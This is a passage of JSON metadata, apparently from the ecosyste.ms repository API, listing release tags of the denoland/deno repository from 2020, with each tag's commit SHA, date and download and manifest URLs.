sts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/